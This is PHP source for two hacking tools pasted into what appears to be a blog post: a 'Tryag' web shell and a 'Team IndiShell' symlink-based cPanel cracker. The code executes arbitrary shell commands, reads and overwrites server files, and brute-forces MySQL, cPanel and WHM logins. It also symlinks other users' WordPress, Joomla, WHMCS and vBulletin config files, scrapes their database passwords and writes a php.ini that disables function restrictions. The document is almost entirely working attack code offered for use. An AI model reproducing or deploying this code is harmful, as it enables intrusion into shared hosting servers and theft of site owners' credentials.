echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
function ccmmdd($ccmmdd2,$att)
{
global $ccmmdd2,$att;
echo '
<table style="width: 100%" class="style1" dir="rtl">
<tr>
<td class="style9"><strong>���� ������</strong></td>
</tr>
<tr>
<td class="style13">
<form method="post">
<select name="att" dir="rtl" style="height: 109px" size="6">
';
if($_POST['att']==null)
{
echo ' <option value="system" selected="">system</option>';
}else{
echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
<option value=system>system</option>
";
}
echo '
<option value="passthru">passthru</option>
<option value="exec">exec</option>
<option value="shell_exec">shell_exec</option>
</select>
<input name="page" value="ccmmdd" type="hidden"><br>
<input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
<input type="submit" value="�����">
</form>
</td>
</tr>
<tr>
<td class="style13">
';
if($_POST[att]=='system')
{
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
system($_POST['ccmmdd2']);
echo ' </textarea>';
}
if($_POST[att]=='passthru')
{
echo '
<textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
passthru($_POST['ccmmdd2']);
echo ' </textarea>';
}
if($_POST[att]=='exec')
{
echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
exec($_POST['ccmmdd2'],$res);
echo $res = join("\n",$res);
echo ' </textarea>';
}
if($_POST[att]=='shell_exec')
{
echo ' <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
echo shell_exec($_POST['ccmmdd2']);
echo ' </textarea>';
}
echo '
</td>
</tr>
</table>
';
exit;
}
if($_POST['page']=='edit')
{
$code=@str_replace("\r\n","\n",$_POST['code']);
$code=@str_replace('\\','',$code);
$fp = fopen($pathclass, 'w');
fwrite($fp,"$code");
fclose($fp);
echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
if($_POST['page']=='show')
{
$pathclass =$_POST['pathclass'];
echo '
<form method="POST">
<input type="hidden" name="page" value="edit">
';
$sahacker = fopen($pathclass, "rb");
echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">';
$code = fread($sahacker, filesize($pathclass));
echo $code =htmlspecialchars($code);
echo '</textarea>';
fclose($sahacker);
echo '
<br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
<br><strong><input type="submit" value="edit file">
</form>
';
exit;
}
if($_POST['page']=='ccmmdd')
{
echo ccmmdd($ccmmdd2,$att);
exit;
}
if($_POST['page']=='find')
{
if(isset($_POST['usernames']) && isset($_POST['passwords']))
{
if($_POST['type'] == 'passwd'){
$e = explode("\n",$_POST['usernames']);
foreach($e as $value){
$k = explode(":",$value);
$username .= $k['0']." ";
}
}elseif($_POST['type'] == 'simple'){
$username = str_replace("\n",' ',$_POST['usernames']);
}
$a1 = explode(" ",$username);
$a2 = explode("\n",$_POST['passwords']);
$id2 = count($a2);
$ok = 0;
foreach($a1 as $user )
{
if($user !== '')
{
$user=trim($user);
for($i=0;$i<=$id2;$i++)
{
$pass = trim($a2[$i]);
if(@mysql_connect('localhost',$user,$pass))
{
echo "TrYag~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
$ok++;
}
}
}
}
echo "<hr><b>You Found <font color=green>$ok</font> Cpanel By Tryag Script Name</b>";
echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
exit;
}
}
?>
<form method="POST" target="_blank">
<strong>
<input name="page" type="hidden" value="find">
</strong>
<table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
<tr>
<td valign="top" bgcolor="#151515"><center><strong><img src="http://www.tryag.cc/img/logo-team.gif" /><br>
</strong>
<a href="http://tryag.cc" class="style2"><strong>Turbo Force By Tryag</strong></a></center></td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>User :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>Pass :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
<strong>Type :</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<span class="style2"><strong>Simple : </strong> </span>
<strong>
<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
<font class="style2"><strong>/etc/passwd : </strong> </font>
<strong>
<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
</strong>
</span>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
</strong>
</td>
<tr>
</form>
<td valign="top" colspan="6"><strong></strong></td>
<form method="POST" target="_blank">
<strong>
<input type="hidden" name="go" value="cmd_mysql">
</strong>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
<td valign="top" bgcolor="#151515"><strong>pass</strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
<td valign="top" bgcolor="#151515"><strong>database</strong></td>
<td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
<strong>cmd ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
<strong>
<textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
SHOW TABLES user_vb ;
SELECT * FROM user;
SELECT version();
SELECT user();</textarea></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
</tr>
<input name="db" value="MySQL" type="hidden">
<input name="db_server" type="hidden" value="localhost">
<input name="db_port" type="hidden" value="3306">
<input name="cccc" type="hidden" value="db_query">
</form>
<tr>
<td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
</tr>
<form method="POST" target="_blank">
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
system - passthru - exec - shell_exec</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<select name="att" dir="rtl" size="1">
<?php
if($_POST['att']==null)
{
echo ' <option value="system" selected="">system</option>';
}else{
echo " <option value='$_POST[att]' selected=''>$_POST[att]</option>
<option value=system>system</option>
";
}
?>
<option value="passthru">passthru</option>
<option value="exec">exec</option>
<option value="shell_exec">shell_exec</option>
</select>
<strong>
<input name="page" type="hidden" value="ccmmdd">
<input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
</tr>
</form>
<form method="POST" target="_blank">
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
File And Edit</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
</tr>
<input name="page" type="hidden" value="show">
</form>
<tr>
<td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
Security</strong></td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<?php
$safe_mode = ini_get('safe_mode');
if($safe_mode=='1')
{
echo 'ON';
}else{
echo 'OFF';
}
?>
</strong>
</td>
</tr>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
<td valign="top" bgcolor="#151515" colspan="5">
<strong>
<?php
if(''==($func=@ini_get('disable_functions')))
{
echo "<font color=#00800F>No Security for Function</font></b>";
}else{
echo "<font color=red>$func</font></b>";
}
?></strong></td>
<tr>
<td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
<td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
</table>
</td>
</tr>
</table>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
<form style="border: 0px ridge #FFFFFF">
<p align="center"></td>
</tr><div align="center">
<tr>
<input type="submit" name="user" value="user"><option value="name"></select>
</form>
<div align="center">
<table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
<tr>
<td bordercolorlight="#008000" bordercolordark="#006A00">
<p align="left">
<textarea method='POST' rows="25" name="S1" cols="16">
<?php
if ($_GET['user'] )
system('ls /var/mail');
for($uid=0;$uid<90000;$uid++){
}
?></textarea>
[8/6, 5:07 PM] Shiv Chauhan Haaxor: <?php
$head = '
<html>
<head>
</script>
<title>--==[[ Don,Symlink Based Cpanel Cracker By Team IndiShell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border : solid 3px ;
border-color : #333;
BACKGROUND-COLOR: white;
font: 11pt Verdana;
color: #333;
}
select {
BORDER-RIGHT: Black 1px solid;
BORDER-TOP: #DF0000 1px solid;
BORDER-LEFT: #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
A:link {
COLOR: White; TEXT-DECORATION: none
}
A:visited {
COLOR: White; TEXT-DECORATION: none
}
A:hover {
color: Red; TEXT-DECORATION: none
}
A:active {
color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>'; ?>
<html>
<head>
<?php
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1"><font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ d0n ]]==--</font><br>
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Symlink Based</font><font color=white size=5 face="comic sans ms"><b> CPanel Cracker By</font><font color=green size=5 face="comic sans ms"><b> Team IndiShell ]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font><br><font color=white>-==[[Greetz to]]==--</font><br><font color=#ff9933> Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,cool toad,cool shavik<br>Ebin V Thomas,Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,cyber warrior,Neo hacker ICA, Golden boy INDIA,Ketan Singh,Yash,Reborn India,Alicks,Aneesh Dogra,silent hacker,lovetherisk<br>Suriya Prakash,cyber gladiator,Cyber Ace,hero,Minhal Mehdi ,Raj bhai ji,cold fire hacker,Mannu, ViKi ,Budhaoo, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand and rest of TEAM INDISHELL<br>
<font color=white>--==[[Dedicated to]]==--</font>
<br># My Father and my Ex Teacher #<br><font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font><br><font color=#ff9933>
####################################################</font><font color=white>#####################################################</font><font color=green>####################################################</font>
</table>
</table> <div align=center><font color=#ff9933 font size=5><marquee behavior="scroll" direction="left" scrollamount="2" scrolldelay="30" width="70%"><span class="footerlink">love happen only once.....Rest is life......</span></marquee><br></font></div><div align=center><table width=50%><font color=#ff9933 font size=5>--==[[ Code for India,Hack for India,Die for India ]]==--</font></table>
';
?>
<body bgcolor=black><h3 style="text-align:center"><font color=red size=2 face="comic sans ms">
<form method=post>
<input type=submit name=ini value="Generate PHP.ini" /></form>
<?php
if(isset($_POST['ini']))
{
$r=fopen('php.ini','w');
$rr=" disable_functions=none ";
fwrite($r,$rr);
$link="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
echo $link;
}
?>
<p>\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking wala jugaad XD ///////////////////////
<?php
//////////////////////////////////////
///// mass symlink ////////
//////////////////////////////////////
?>
<form method=post>
<input type=submit name="usre" value="click to Extract usernames and mass symlink" /></form>
<?php
if(isset($_POST['usre'])){
?><form method=post>
<textarea rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><br><br>
<input type=submit name=su value="bhaiyu ^_^ .. lets start" /></form>
<?php } ?>
<?php
error_reporting(0);
echo "<font color=red size=2 face=\"comic sans ms\">";
if(isset($_POST['su']))
{
$dir=mkdir('IcA',0777);
$r = " Options all \n DirectoryIndex ICA.html \n Require None \n Satisfy Any";
$f = fopen('IcA/.htaccess','w');
fwrite($f,$r);
$consym="<a href=IcA/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
echo "<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
$usr=explode("\n",$_POST['user']);
foreach($usr as $uss )
{
$us=trim($uss);
$r="IcA/";
symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
symlink('/home/'.$us.'/public_html/wordpress/wp-config.php',$r.$us.'..word-wp');
symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wpblog');
symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');
symlink('/home/'.$us.'/public_html/joomla/configuration.php',$r.$us.'..joomla');
symlink('/home/'.$us.'/public_html/vb/includes/config.php',$r.$us.'..vbinc');
symlink('/home/'.$us.'/public_html/includes/config.php',$r.$us.'..vb');
symlink('/home/'.$us.'/public_html/conf_global.php',$r.$us.'..conf_global');
symlink('/home/'.$us.'/public_html/inc/config.php',$r.$us.'..inc');
symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
symlink('/home/'.$us.'/public_html/Settings.php',$r.$us.'..Settings');
symlink('/home/'.$us.'/public_html/sites/default/settings.php',$r.$us.'..sites');
symlink('/home/'.$us.'/public_html/whm/configuration.php',$r.$us.'..whm');
symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
symlink('/home/'.$us.'/public_html/whmc/WHM/configuration.php',$r.$us.'..WHM');
symlink('/home/'.$us.'/public_html/whm/WHMCS/configuration.php',$r.$us.'..whmc');
symlink('/home/'.$us.'/public_html/whm/whmcs/configuration.php',$r.$us.'..WHMcs');
symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..whmcsupp');
symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-cli');
symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-cl');
symlink('/home/'.$us.'/public_html/clientes/configuration.php',$r.$us.'..whmcs-CL');
symlink('/home/'.$us.'/public_html/cliente/configuration.php',$r.$us.'..whmcs-Cl');
symlink('/home/'.$us.'/public_html/clientsupport/configuration.php',$r.$us.'..whmcs-csup');
symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-bill');
symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-conf');
}
}
?>
<?php
//////////////////////////////////////
/////password grabbing section////////
//////////////////////////////////////
?>
<form method=post>
<input type=submit name=sm value="start grabbing passwords from configuration files"></form>
<?php
error_reporting(0);
set_time_limit(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
{
$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=trim($ar1[0]);
return $ar;
}
if(isset($_POST['sm']))
{
echo "bhai ji ... have a cup of tea.. tab tak main is server ki jaan nikalta hoon :P";
$ffile=fopen('r.txt','a+');
$r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/IcA/";
$re=$r;
$confi=array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
$usersss=$str[0];
foreach($confi as $co)
{
$uurl=$re.$usersss.$co;
$uel=$uurl;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uel);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
$uxl=$result['EXE'];
if($uxl && preg_match('/table_prefix/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is wordpress </font></td></tr></table>";
echo $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
if(!empty($dbp))
$pass=$dbp."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website whmcs bhaiyu xD </font></td></tr></table>";
echo $dbp=entre2v2($uxl,"db_password = '","';");
if(!empty($dbp))
$pass=$dbp."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbprefix/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is joomla </font></td></tr></table>";
echo $db=entre2v2($uxl,"password = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/admincpdir/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's website cms is vbulletin </font></td></tr></table>";
echo $db=entre2v2($uxl,"password'] = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms for user $usersss </font></td></tr></table>";
echo $db=entre2v2($uxl,"DB_PASSWORD', '","');");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> got config file for unknwon cms of user $usersss </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = '","';");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
elseif($uxl && preg_match('/dbpass/i',$uxl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> $usersss user's config file for unknwon cms </font></td></tr></table>";
echo $db=entre2v2($uxl,"dbpass = \"","\";");
if(!empty($db))
$pass=$db."\n";
fwrite($ffile,$pass);
}
}
}
}
?>
<?php
/////////////////////////////////
///// cpanel cracker ///////
/////////////////////////////////
?>
<form method=post>
<input type=submit name=cpanel value="Auto username/password loading cpanel cracker"><p>
<?php
if(isset($_POST['cpanel']))
{
?>
<form method=post><div align=center><table>
want to brute=><select name="op"> <option name="op" value="cp">CPanel</option>
<option name="op" value="whm">WHMPanel</option></table><p>
<textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."\n";
}
?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
<?php
$d=getcwd()."/r.txt";
$pf=file($d);
foreach($pf as $rt)
{
$str=explode('\n',$rt);
echo trim($str[0])."\n";
} ?></textarea><p>
<input type=submit name=cpanelcracking value="kerde khaat khadi >.<"></form>
<?php
}
?>
<?php
error_reporting(0);
$connect_timeout=5;
set_time_limit(0);
$userl=$_POST['usernames'];
$passl=$_POST['passwords'];
$attack=$_POST['op'];
$target = "localhost";
if(isset($_POST['cpanelcracking']))
{
if($userl!=="" && $passl!=="")
{
if($_POST["op"]=="cp")
{
$cracked=$_POST['crack'];
@fopen($cracked,'a');
echo "bhai ji ^_^ ......now we are attacking cpanels....please wait till the end of process \n";
}
elseif($_POST["op"]=="whm")
{
@fopen($cracked,'a');
echo "bhai ji ^_^ ......now we are attacking WHM panel....please wait till the end of process";
}
function cpanel($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);
if ($attack == "cp")
{
foreach ($userlist as $user) {
echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);
cpanel($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
function whm($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);
if ($attack == "whm")
{
foreach ($userlist as $user) {
echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);
whm($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
}
elseif($userl=="")
{
echo "what are you doing bhai ji :( , you have left userlist field empty";
}
elseif($passl=="")
{
echo "bhai ji :( ... please put passwords in paasword list field";
}
}
?>
Comments
Post a Comment